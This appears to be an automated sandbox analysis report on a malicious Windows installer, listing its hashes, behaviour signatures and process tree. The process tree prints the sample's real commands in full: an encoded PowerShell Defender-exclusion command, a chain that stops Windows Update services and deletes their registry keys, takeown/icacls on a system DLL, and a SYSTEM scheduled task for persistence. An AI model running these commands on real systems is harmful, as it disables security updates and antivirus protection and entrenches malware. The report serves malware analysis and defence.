Analysis
-
max time kernel
72s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
05-05-2022 01:16
Static task
static1
General
-
Target
Setup.exe
-
Size
4MB
-
MD5
62ed80f638e9551e1e59b4ea9341bccd
-
SHA1
44196e8cb0f5774decf60e12215767f092c3c008
-
SHA256
c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf
-
SHA512
56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
Executes dropped EXE 3 IoCs
Processes:
iexplor.exeiexplore.exeiexplore.exepid process 2648 iexplor.exe 4596 iexplore.exe 2884 iexplore.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1076 takeown.exe 1380 icacls.exe 3324 takeown.exe 2816 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
iexplore.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation iexplore.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 1380 icacls.exe 3324 takeown.exe 2816 icacls.exe 1076 takeown.exe -
Processes:
iexplore.exeiexplore.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
iexplor.exedescription pid process target process PID 2648 set thread context of 2296 2648 iexplor.exe AppLaunch.exe -
Drops file in Program Files directory 2 IoCs
Processes:
iexplore.exedescription ioc process File opened for modification C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe iexplore.exe File created C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe iexplore.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exeiexplore.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3552 reg.exe 3904 reg.exe 1548 reg.exe 1492 reg.exe 1604 reg.exe 5032 reg.exe 212 reg.exe 3180 reg.exe 1348 reg.exe 2300 reg.exe 2052 reg.exe 3128 reg.exe 5036 reg.exe 2308 reg.exe 5104 reg.exe 4580 reg.exe 1040 reg.exe 1500 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeiexplore.exepowershell.exepid process 232 powershell.exe 232 powershell.exe 4596 iexplore.exe 4692 powershell.exe 4692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
AppLaunch.exepowershell.exeiexplore.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 2296 AppLaunch.exe Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 4596 iexplore.exe Token: SeTakeOwnershipPrivilege 3324 takeown.exe Token: SeDebugPrivilege 4692 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup.exeiexplor.exeiexplore.execmd.execmd.execmd.exedescription pid process target process PID 2816 wrote to memory of 2648 2816 Setup.exe iexplor.exe PID 2816 wrote to memory of 2648 2816 Setup.exe iexplor.exe PID 2816 wrote to memory of 2648 2816 Setup.exe iexplor.exe PID 2648 wrote to memory of 2296 2648 iexplor.exe AppLaunch.exe PID 2648 wrote to memory of 2296 2648 iexplor.exe AppLaunch.exe PID 2648 wrote to memory of 2296 2648 iexplor.exe AppLaunch.exe PID 2648 wrote to memory of 2296 2648 iexplor.exe AppLaunch.exe PID 2648 wrote to memory of 2296 2648 iexplor.exe AppLaunch.exe PID 2816 wrote to memory of 4596 2816 Setup.exe iexplore.exe PID 2816 wrote to memory of 4596 2816 Setup.exe iexplore.exe PID 4596 wrote to memory of 4964 4596 iexplore.exe cmd.exe PID 4596 wrote to memory of 4964 4596 iexplore.exe cmd.exe PID 4964 wrote to memory of 232 4964 cmd.exe powershell.exe PID 4964 wrote to memory of 232 4964 cmd.exe powershell.exe PID 4596 wrote to memory of 3188 4596 iexplore.exe cmd.exe PID 4596 wrote to memory of 3188 4596 iexplore.exe cmd.exe PID 3188 wrote to memory of 4880 3188 cmd.exe sc.exe PID 3188 wrote to memory of 4880 3188 cmd.exe sc.exe PID 3188 wrote to memory of 4360 3188 cmd.exe sc.exe PID 3188 wrote to memory of 4360 3188 cmd.exe sc.exe PID 3188 wrote to memory of 4796 3188 cmd.exe sc.exe PID 3188 wrote to memory of 4796 3188 cmd.exe sc.exe PID 3188 wrote to memory of 2656 3188 cmd.exe sc.exe PID 3188 wrote to memory of 2656 3188 cmd.exe sc.exe PID 3188 wrote to memory of 4328 3188 cmd.exe sc.exe PID 3188 wrote to memory of 4328 3188 cmd.exe sc.exe PID 3188 wrote to memory of 2300 3188 cmd.exe reg.exe PID 3188 wrote to memory of 2300 3188 cmd.exe reg.exe PID 3188 wrote to memory of 5032 3188 cmd.exe reg.exe PID 3188 wrote to memory of 5032 3188 cmd.exe reg.exe PID 3188 wrote to memory of 1604 3188 cmd.exe reg.exe PID 3188 wrote to memory of 1604 3188 cmd.exe reg.exe PID 3188 wrote to memory of 1500 3188 cmd.exe reg.exe PID 3188 wrote to memory of 1500 3188 cmd.exe reg.exe PID 4596 wrote to memory of 4456 4596 iexplore.exe cmd.exe PID 4596 wrote to memory of 4456 4596 iexplore.exe cmd.exe PID 3188 wrote to memory of 2308 3188 cmd.exe reg.exe PID 3188 wrote to memory of 2308 3188 cmd.exe reg.exe PID 3188 wrote to memory of 3324 3188 cmd.exe takeown.exe PID 3188 wrote to memory of 3324 3188 cmd.exe takeown.exe PID 3188 wrote to memory of 1380 3188 cmd.exe icacls.exe PID 3188 wrote to memory of 1380 3188 cmd.exe icacls.exe PID 4456 wrote to memory of 4720 4456 cmd.exe schtasks.exe PID 4456 wrote to memory of 4720 4456 cmd.exe schtasks.exe PID 3188 wrote to memory of 1492 3188 cmd.exe reg.exe PID 3188 wrote to memory of 1492 3188 cmd.exe reg.exe PID 3188 wrote to memory of 1548 3188 cmd.exe reg.exe PID 3188 wrote to memory of 1548 3188 cmd.exe reg.exe PID 3188 wrote to memory of 3904 3188 cmd.exe reg.exe PID 3188 wrote to memory of 3904 3188 cmd.exe reg.exe PID 3188 wrote to memory of 3552 3188 cmd.exe reg.exe PID 3188 wrote to memory of 3552 3188 cmd.exe reg.exe PID 3188 wrote to memory of 4064 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 4064 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 1632 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 1632 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 4300 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 4300 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 1292 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 1292 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 3684 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 3684 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 872 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 872 3188 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\iexplor.exeC:\Users\Admin\AppData\Local\Temp\iexplor.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\iexplore.exeC:\Users\Admin\AppData\Local\Temp\iexplore.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"3⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f1⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop bits1⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
-
C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="2⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "vqtwwwbrwdqzx"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "iexplore"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc stop bits1⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE1⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exeFilesize
109MB
MD51950297d47a665359dde4d26aca66cea
